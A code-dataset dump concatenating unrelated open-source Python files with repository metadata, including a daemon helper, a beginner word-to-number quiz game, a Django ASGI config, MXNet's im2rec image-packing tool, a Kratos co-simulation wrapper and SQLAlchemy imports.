for i in range(3, max_fd):
try:
os.close(i)
except OSError:
pass
def _default_pid_file():
if hasattr(__main__, '__file__'):
name = __main__.__file__
name = os.path.basename(name)
if name == '<stdin>':
name = '__stdin__'
return '/var/run/' + name.rsplit('.', 1)[0]
else:
return '/var/run/pykit.daemonize'
def daemonize_cli(run_func, pidfn, close_fds=False):
"""
Read command line arguments and then start, stop or restart a daemon process.
:param run_func: a callable object such as a `function` or `lambda` to run after the daemon
process is created.
:param pidfn: abosolute path of `pid` file. It is used to identify a daemon process.
Thus two processes those are with the same `pid` file can not run at the same time.
:param close_fds: If it is `True`, besides `stdin`, `stdout` and `stderr`, all other file descriptors
will also be closed.
:return: None
"""
logging.basicConfig(stream=sys.stderr)
logging.getLogger(__name__).setLevel(logging.DEBUG)
d = Daemon(pidfile=pidfn, close_fds=close_fds)
logger.info("sys.argv: " + repr(sys.argv))
try:
if len(sys.argv) == 1:
d.init_proc()
run_func()
elif len(sys.argv) == 2:
if 'start' == sys.argv[1]:
d.start()
run_func()
elif 'stop' == sys.argv[1]:
d.stop()
elif 'restart' == sys.argv[1]:
d.stop()
d.start()
run_func()
else:
logger.error("Unknown command: %s" % (sys.argv[1]))
print("Unknown command")
sys.exit(2)
sys.exit(0)
else:
print("usage: %s start|stop|restart" % sys.argv[0])
sys.exit(2)
except Exception as e:
logger.exception(repr(e))
standard_daemonize = daemonize_cli
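
# A minimal usage sketch, assuming this module is importable as `daemonize`;
# `run_forever` is a hypothetical worker function, not part of this module:
#
#   from daemonize import daemonize_cli
#
#   def run_forever():
#       while True:
#           pass  # real work goes here
#
#   if __name__ == '__main__':
#       # invoked as: python myservice.py start|stop|restart
#       daemonize_cli(run_forever, '/var/run/myservice.pid')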
| 26.167273
| 105
| 0.529878
|
bd5d9b8605c51d4fdbab510b566427379f31a499
| 18,565
|
py
|
Python
|
Math Police.py
|
RobinhoodDev/MathPolice
|
c73aadaeaee5ba45ebc4f3e3c8431a4a53ee531b
|
[
"MIT"
] | 1
|
2021-10-20T11:48:50.000Z
|
2021-10-20T11:48:50.000Z
|
Math Police.py
|
RobinhoodDev/MathPolice
|
c73aadaeaee5ba45ebc4f3e3c8431a4a53ee531b
|
[
"MIT"
] | null | null | null |
Math Police.py
|
RobinhoodDev/MathPolice
|
c73aadaeaee5ba45ebc4f3e3c8431a4a53ee531b
|
[
"MIT"
] | null | null | null |
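# The quiz below scores each word with a simple letter-sum cipher: a letter is
# worth its position in the alphabet (a=1 ... z=26) and a word's value is the
# sum of its letters. A minimal helper sketching the scheme (added for clarity,
# not used by the quiz itself); e.g. word_value("cat") == 3 + 1 + 20 == 24:
def word_value(word):
    return sum(ord(c) - ord('a') + 1 for c in word.lower())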
score = 0
score = int(score)
print("Welcome to Math Police! Created by Robinhood#6198.")
d = input("Which difficulty would you like to play?")
if d == "Easy":
print("Welcome to Math Police Easy!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word cat into a numeric value"))
if answer1 == 24:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word dog into a numeric value"))
if answer2 == 26:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word hats into a numeric value"))
if answer3 == 48:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word lunch into a numeric value."))
if answer4 == 58:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word danger into a numeric value."))
if answer5 == 49:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 5:
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score > 2:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2.")
if answer6 == "yes":
score = 0
score = int(score)
answer1 = int(input("Translate the word cat into a numeric value"))
if answer1 == 24:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word dog into a numeric value"))
if answer2 == 26:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word hats into a numeric value"))
if answer3 == 48:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word lunch into a numeric value."))
if answer4 == 58:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word danger into a numeric value."))
if answer5 == 49:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "5":
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score >= 3:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
elif d == "Medium":
print("Welcome to Math Police Medium!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word safely into a numeric value"))
if answer1 == 68:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word privacy into a numeric value"))
if answer2 == 94:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word suburban into a numeric value"))
if answer3 == 98:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word capacity into a numeric value."))
if answer4 == 78:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word microsoft into a numeric value."))
if answer5 == 86:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 5:
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score > 2:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2.")
if answer6 == "yes":
score = 0
score = int(score)
answer1 = int(input("Translate the word safely into a numeric value"))
if answer1 == 68:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word privacy into a numeric value"))
if answer2 == 94:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word suburban into a numeric value"))
if answer3 == 98:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word capacity into a numeric value."))
if answer4 == 78:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word microsoft into a numeric value."))
if answer5 == 86:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "5":
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score >= 3:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
if d == "Hard":
score = 0
score = int(score)
print("Welcome to Math Police Hard!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word abalienate into a numeric value"))
if answer1 == 70:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word xenobiosis into a numeric value"))
if answer2 == 131:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word voicelessly into a numeric value"))
if answer3 == 146:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word xanthogenic into a numeric value."))
if answer4 == 120:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word vaccinogenic into a numeric value."))
if answer5 == 105:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 5:
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score > 2:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2 .")
if answer6 == "yes":
score = 0
score = int(score)
answer1 = int(input("Translate the word abalienate into a numeric value"))
if answer1 == 70:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word xenobiosis into a numeric value"))
if answer2 == 131:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word voicelessly into a numeric value"))
if answer3 == 146:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word xanthogenic into a numeric value."))
if answer4 == 120:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(input("Boss Word! Translate the word vaccinogenic into a numeric value."))
if answer5 == 105:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "5":
print("Your score is" + " " + str(score) + " " + "out of 5.")
elif score < 5 and score >= 3:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
if d == "Insane":
score = 0
score = int(score)
print("Welcome to Math Police Insane!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word acetylglycine into a numeric value"))
if answer1 == 141:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word vitreodentinal into a numeric value"))
if answer2 == 168:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word vitrifications into a numeric value"))
if answer3 == 174:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 3:
print("Your score is" + " " + str(score) + " " + "out of 3.Perfect!")
elif score < 3 and score > 1:
print("Your score is" + " " + str(score) + " " + "out of 3. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 3. Better luck next time!")
    while score < 3:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2.")
if answer6 == "yes":
answer1 = int(input("Translate the word acetylglycine into a numeric value"))
if answer1 == 141:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word vitreodentinal into a numeric value"))
if answer2 == 168:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word vitrifications into a numeric value"))
if answer3 == 174:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "3":
print("Your score is" + " " + str(score) + " " + "out of 3.Perfect!")
elif score < 3 and score >= 1:
print("Your score is" + " " + str(score) + " " + "out of 3. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 3. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
if d == "Godlike":
score = 0
score = int(score)
print("Welcome to Math Police Godlike!")
print("Make sure you are ready to begin this quiz. Remember this quiz must be done in Python 3.")
answer1 = int(input("Translate the word floccinaucinihilipilification into a numeric value"))
if answer1 == 280:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word pseudopseudohypoparathyroidism into a numeric value"))
if answer2 == 400:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word supercalifragilisticexpialidocious into a numeric value"))
if answer3 == 379:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word hippopotomonstrosesquippedaliophobia into a numeric value."))
if answer4 == 463:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(
input("Boss Word! Translate the word pneumonoultramicroscopicsilicovolcanoconiosis into a numeric value."))
if answer5 == 560:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == 5:
print("Your score is" + " " + str(score) + " " + "out of 5.Perfect!")
elif score < 5 and score > 2:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
while score < 5:
answer6 = input(
"Do you want to retake this quiz? This message should only appear if you did not get a perfect score. If this message appears even with a perfect score, please report the bug at https://github.com/RobinhoodDev/MathPolice/discussions/2.")
if answer6 == "yes":
score = 0
score = int(score)
answer1 = int(input("Translate the word floccinaucinihilipilification into a numeric value"))
if answer1 == 280:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer2 = int(input("Translate the word pseudopseudohypoparathyroidism into a numeric value"))
if answer2 == 400:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer3 = int(input("Translate the word supercalifragilisticexpialidocious into a numeric value"))
if answer3 == 379:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer4 = int(input("Translate the word hippopotomonstrosesquippedaliophobia into a numeric value."))
if answer4 == 463:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
answer5 = int(
input(
"Boss Word! Translate the word pneumonoultramicroscopicsilicovolcanoconiosis into a numeric value."))
if answer5 == 560:
print("Correct!")
score = score + 1
else:
print("Incorrect!")
if score == "5":
print("Your score is" + " " + str(score) + " " + "out of 5.")
elif score < 5 and score >= 3:
print("Your score is" + " " + str(score) + " " + "out of 5. That's pretty good!")
else:
print("Your score is" + " " + str(score) + " " + "out of 5. Better luck next time!")
elif answer6 == "no":
score = 5
print("Please exit this quiz with exit().")
if d == "Boss Word 1":
answer5 = int(input(
"Boss Word! Translate the word lopadotemachoselachogaleokranioleipsanodrimhypotrimmatosilphiokarabomelitokatakechymenokichlepikossyphophattoperisteralektryonoptekephalliokigklopeleiolagoiosiraiobaphetraganopterygon into a numeric value."))
if (answer5 == 2091):
print("Correct!")
else:
print("Incorrect!")
| 28.214286
| 251
| 0.506168
|
f867ff8d13c45b30e961f2e59774a57e1d7b49b9
| 439
|
py
|
Python
|
django_website_database_project/django_website_database_project/asgi.py
|
RodneyMcCoy/store-website-database
|
d3d983ddb562eaa173e939f1f9df5a4f664a3227
|
[
"MIT"
] | null | null | null |
django_website_database_project/django_website_database_project/asgi.py
|
RodneyMcCoy/store-website-database
|
d3d983ddb562eaa173e939f1f9df5a4f664a3227
|
[
"MIT"
] | null | null | null |
django_website_database_project/django_website_database_project/asgi.py
|
RodneyMcCoy/store-website-database
|
d3d983ddb562eaa173e939f1f9df5a4f664a3227
|
[
"MIT"
] | null | null | null |
"""
ASGI config for django_website_database_project project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'django_website_database_project.settings')
application = get_asgi_application()
| 25.823529
| 91
| 0.808656
|
7f929138a49bc1d2f5020e107362b46d24675447
| 64
|
py
|
Python
|
enthought/pyface/ui/null/action/tool_palette.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 3
|
2016-12-09T06:05:18.000Z
|
2018-03-01T13:00:29.000Z
|
enthought/pyface/ui/null/action/tool_palette.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | 1
|
2020-12-02T00:51:32.000Z
|
2020-12-02T08:48:55.000Z
|
enthought/pyface/ui/null/action/tool_palette.py
|
enthought/etsproxy
|
4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347
|
[
"BSD-3-Clause"
] | null | null | null |
# proxy module
from pyface.ui.null.action.tool_palette import *
| 21.333333
| 48
| 0.796875
|
947f8908a77592dbea7a2a4f27e4897122948762
| 10,896
|
py
|
Python
|
tools/im2rec.py
|
xcgoner/ps-mxnet-new
|
958d0eb56f6a9b65371cd4c994b9c55a4efa449c
|
[
"Apache-2.0"
] | null | null | null |
tools/im2rec.py
|
xcgoner/ps-mxnet-new
|
958d0eb56f6a9b65371cd4c994b9c55a4efa449c
|
[
"Apache-2.0"
] | null | null | null |
tools/im2rec.py
|
xcgoner/ps-mxnet-new
|
958d0eb56f6a9b65371cd4c994b9c55a4efa449c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
def list_image(root, recursive, exts):
image_list = []
if recursive:
cat = {}
for path, subdirs, files in os.walk(root, followlinks=True):
subdirs.sort()
print(len(cat), path)
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (len(image_list), os.path.relpath(fpath, root), cat[path])
else:
for fname in os.listdir(root):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
yield (len(image_list), os.path.relpath(fpath, root), 0)
def write_list(path_out, image_list):
with open(path_out, 'w') as fout:
for i, item in enumerate(image_list):
line = '%d\t' % item[0]
for j in item[2:]:
line += '%f\t' % j
line += '%s\n' % item[1]
fout.write(line)
def make_list(args):
image_list = list_image(args.root, args.recursive, args.exts)
image_list = list(image_list)
if args.shuffle is True:
random.seed(100)
random.shuffle(image_list)
N = len(image_list)
    chunk_size = (N + args.chunks - 1) // args.chunks
    for i in range(args.chunks):
chunk = image_list[i * chunk_size:(i + 1) * chunk_size]
if args.chunks > 1:
str_chunk = '_%d' % i
else:
str_chunk = ''
sep = int(chunk_size * args.train_ratio)
sep_test = int(chunk_size * args.test_ratio)
write_list(args.prefix + str_chunk + '_test.lst', chunk[:sep_test])
write_list(args.prefix + str_chunk + '_train.lst', chunk[sep_test:sep_test + sep])
write_list(args.prefix + str_chunk + '_val.lst', chunk[sep_test + sep:])
def read_list(path_in):
with open(path_in) as fin:
while True:
line = fin.readline()
if not line:
break
line = [i.strip() for i in line.strip().split('\t')]
item = [int(line[0])] + [line[-1]] + [float(i) for i in line[1:-1]]
yield item
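# Each .lst line is tab-separated: "<index>\t<label(s)>\t<relative/path>".
# read_list() reorders it into [index, path, label(s)...] so that
# image_encode() can read the path as item[1] and the labels as item[2:].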
def image_encode(args, item, q_out):
try:
img = cv2.imread(os.path.join(args.root, item[1]), args.color)
except:
print('imread error:', item[1])
return
if img is None:
print('read none error:', item[1])
return
if args.center_crop:
if img.shape[0] > img.shape[1]:
            margin = (img.shape[0] - img.shape[1]) // 2
            img = img[margin:margin + img.shape[1], :]
        else:
            margin = (img.shape[1] - img.shape[0]) // 2
            img = img[:, margin:margin + img.shape[0]]
if args.resize:
if img.shape[0] > img.shape[1]:
            newsize = (args.resize, img.shape[0] * args.resize // img.shape[1])
        else:
            newsize = (img.shape[1] * args.resize // img.shape[0], args.resize)
img = cv2.resize(img, newsize)
if len(item) > 3 and args.pack_label:
header = mx.recordio.IRHeader(0, item[2:], item[0], 0)
else:
header = mx.recordio.IRHeader(0, item[2], item[0], 0)
try:
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((s, item))
    except Exception as e:
print('pack_img error:', item[1], e)
return
def read_worker(args, q_in, q_out):
while True:
item = q_in.get()
if item is None:
break
image_encode(args, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
    fname_rec = os.path.splitext(os.path.basename(fname))[0] + '.rec'
fout = open(fname+'.tmp', 'w')
record = mx.recordio.MXRecordIO(os.path.join(working_dir, fname_rec), 'w')
while True:
deq = q_out.get()
if deq is None:
break
s, item = deq
record.write(s)
line = '%d\t' % item[0]
for j in item[2:]:
line += '%f\t' % j
line += '%s\n' % item[1]
fout.write(line)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
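    # Atomically replace the original .lst so the list on disk matches the
    # order of records actually written to the .rec file (the order can
    # differ from the input when --num-thread > 1).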
os.rename(fname+'.tmp', fname)
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', type=list, default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--resize', type=int, default=0,
help='resize the shorter edge of image to the newsize, original images will\
be packed by default.')
rgroup.add_argument('--center-crop', type=bool, default=False,
help='specify whether to crop the center image to make it rectangular.')
rgroup.add_argument('--quality', type=int, default=80,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--shuffle', default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup.add_argument('--pack-label', default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
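                # Pipeline: num_thread read_worker processes pull list items
                # from q_in and push encoded records to q_out, while a single
                # write_worker drains q_out into the .rec file.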
try:
import multiprocessing
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put(item)
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
except ImportError:
print('multiprocessing not available, fall back to single threaded encoding')
                    import queue
                    q_out = queue.Queue()
                    fname_rec = os.path.splitext(os.path.basename(fname))[0] + '.rec'
record = mx.recordio.MXRecordIO(os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for item in image_list:
image_encode(args, item, q_out)
if q_out.empty():
continue
                        s, _ = q_out.get()
record.write(s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
            print('Did not find any .lst file with prefix %s' % args.prefix)
| 42.5625
| 114
| 0.558645
|
d9bc43080034344321fed96e1b4faf5ccf0d86ef
| 3,416
|
py
|
Python
|
applications/CoSimulationApplication/python_scripts/convergence_accelerators/convergence_accelerator_wrapper.py
|
alecontri/Kratos
|
9a003679c1a12a159466e6e61a371e1286f379ca
|
[
"BSD-4-Clause"
] | 2
|
2020-12-22T11:50:11.000Z
|
2021-09-15T11:36:30.000Z
|
applications/CoSimulationApplication/python_scripts/convergence_accelerators/convergence_accelerator_wrapper.py
|
alecontri/Kratos
|
9a003679c1a12a159466e6e61a371e1286f379ca
|
[
"BSD-4-Clause"
] | 1
|
2021-11-19T12:14:50.000Z
|
2021-11-19T12:14:50.000Z
|
applications/CoSimulationApplication/python_scripts/convergence_accelerators/convergence_accelerator_wrapper.py
|
philbucher/Kratos
|
1ceb900dbacfab344e27e32285250eafc52093ec
|
[
"BSD-4-Clause"
] | null | null | null |
# CoSimulation imports
from KratosMultiphysics.CoSimulationApplication.factories.convergence_accelerator_factory import CreateConvergenceAccelerator
# Other imports
import numpy as np
class ConvergenceAcceleratorWrapper:
"""This class wraps the convergence accelerators such that they can be used "automized"
=> this class stores the residual and updates the solutions, such that the
convergence accelerator can be configured through json
In case of distributed data, it is checked whether the convergence accelerator supports it.
If not, the data is gathered / scattered and the accelerator is executed on only one rank
"""
def __init__(self, settings, solver_wrapper):
self.interface_data = solver_wrapper.GetInterfaceData(settings["data_name"].GetString())
settings.RemoveValue("data_name")
settings.RemoveValue("solver")
self.conv_acc = CreateConvergenceAccelerator(settings)
if self.interface_data.IsDefinedOnThisRank():
conv_acc_supports_dist_data = self.conv_acc.SupportsDistributedData()
self.executing_rank = conv_acc_supports_dist_data or (self.interface_data.GetModelPart().GetCommunicator().MyPID() == 0)
self.gather_scatter_required = self.interface_data.IsDistributed() and not conv_acc_supports_dist_data
if self.gather_scatter_required:
self.data_comm = self.interface_data.GetModelPart().GetCommunicator().GetDataCommunicator()
self.sizes_from_ranks = np.cumsum(self.data_comm.GatherInts([self.interface_data.Size()], 0))
def Initialize(self):
self.conv_acc.Initialize()
def Finalize(self):
self.conv_acc.Finalize()
def InitializeSolutionStep(self):
self.conv_acc.InitializeSolutionStep()
def FinalizeSolutionStep(self):
self.conv_acc.FinalizeSolutionStep()
def InitializeNonLinearIteration(self):
if self.interface_data.IsDefinedOnThisRank():
# Saving the previous data for the computation of the residual
# and the computation of the solution update
self.input_data = self.interface_data.GetData()
self.conv_acc.InitializeNonLinearIteration()
def FinalizeNonLinearIteration(self):
self.conv_acc.FinalizeNonLinearIteration()
def ComputeAndApplyUpdate(self):
if not self.interface_data.IsDefinedOnThisRank(): return
current_data = self.interface_data.GetData()
residual = current_data - self.input_data
input_data_for_acc = self.input_data
if self.gather_scatter_required:
residual = np.array(np.concatenate(self.data_comm.GathervDoubles(residual, 0)))
input_data_for_acc = np.array(np.concatenate(self.data_comm.GathervDoubles(input_data_for_acc, 0)))
if self.executing_rank:
updated_data = input_data_for_acc + self.conv_acc.UpdateSolution(residual, input_data_for_acc)
if self.gather_scatter_required:
if self.executing_rank:
data_to_scatter = np.split(updated_data, self.sizes_from_ranks[:-1])
else:
data_to_scatter = []
updated_data = self.data_comm.ScattervDoubles(data_to_scatter, 0)
self.interface_data.SetData(updated_data)
def PrintInfo(self):
self.conv_acc.PrintInfo()
def Check(self):
self.conv_acc.Check()
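
# A minimal, framework-free sketch of the gather/scatter bookkeeping used in
# ComputeAndApplyUpdate above, assuming three ranks contribute arrays of
# sizes 2, 3 and 1 (illustration only, not part of the original module):
#
#   import numpy as np
#   sizes_from_ranks = np.cumsum([2, 3, 1])             # array([2, 5, 6])
#   gathered = np.arange(6.0)                           # data gathered on rank 0
#   chunks = np.split(gathered, sizes_from_ranks[:-1])  # pieces to scatter back
#   assert [len(c) for c in chunks] == [2, 3, 1]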
| 42.17284
| 132
| 0.717799
|
8d0644c080ada7551d7bb424d2965d4759a2fc58
| 4,623
|
py
|
Python
|
lib/sqlalchemy/__init__.py
|
lelit/sqlalchemy
|
55f930ef3d4e60bed02a2dad16e331fe42cfd12b
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/__init__.py
|
lelit/sqlalchemy
|
55f930ef3d4e60bed02a2dad16e331fe42cfd12b
|
[
"MIT"
] | null | null | null |
lib/sqlalchemy/__init__.py
|
lelit/sqlalchemy
|
55f930ef3d4e60bed02a2dad16e331fe42cfd12b
|
[
"MIT"
] | null | null | null |
# sqlalchemy/__init__.py
# Copyright (C) 2005-2019 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from . import util as _util # noqa
from .inspection import inspect # noqa
from .schema import BLANK_SCHEMA # noqa
from .schema import CheckConstraint # noqa
from .schema import Column # noqa
from .schema import ColumnDefault # noqa
from .schema import Constraint # noqa
from .schema import DDL # noqa
from .schema import DefaultClause # noqa
from .schema import FetchedValue # noqa
from .schema import ForeignKey # noqa
from .schema import ForeignKeyConstraint # noqa
from .schema import Index # noqa
from .schema import MetaData # noqa
from .schema import PassiveDefault # noqa
from .schema import PrimaryKeyConstraint # noqa
from .schema import Sequence # noqa
from .schema import Table # noqa
from .schema import ThreadLocalMetaData # noqa
from .schema import UniqueConstraint # noqa
from .sql import alias # noqa
from .sql import all_ # noqa
from .sql import and_ # noqa
from .sql import any_ # noqa
from .sql import asc # noqa
from .sql import between # noqa
from .sql import bindparam # noqa
from .sql import case # noqa
from .sql import cast # noqa
from .sql import collate # noqa
from .sql import column # noqa
from .sql import delete # noqa
from .sql import desc # noqa
from .sql import distinct # noqa
